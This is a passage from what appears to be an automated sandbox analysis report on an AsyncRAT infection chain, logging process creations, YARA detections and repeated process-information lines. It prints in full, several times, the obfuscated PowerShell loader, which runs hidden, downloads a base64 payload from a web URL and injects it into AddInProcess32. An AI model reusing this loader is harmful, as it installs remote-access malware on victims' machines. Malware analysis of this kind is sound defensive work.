c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?

Obfuscated command line found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD347A6224 push E85AAB2Fh; ret	4_2_00007FFD347A62F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD347AC757 push ebp; retf	4_2_00007FFD347AC758
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD347A47AB push ecx; retf	4_2_00007FFD347A47AC

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.2198f4fa460.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.2198f4fa460.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3465673690.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2257689988.000002198F4E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 5792, type: MEMORYSTR

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
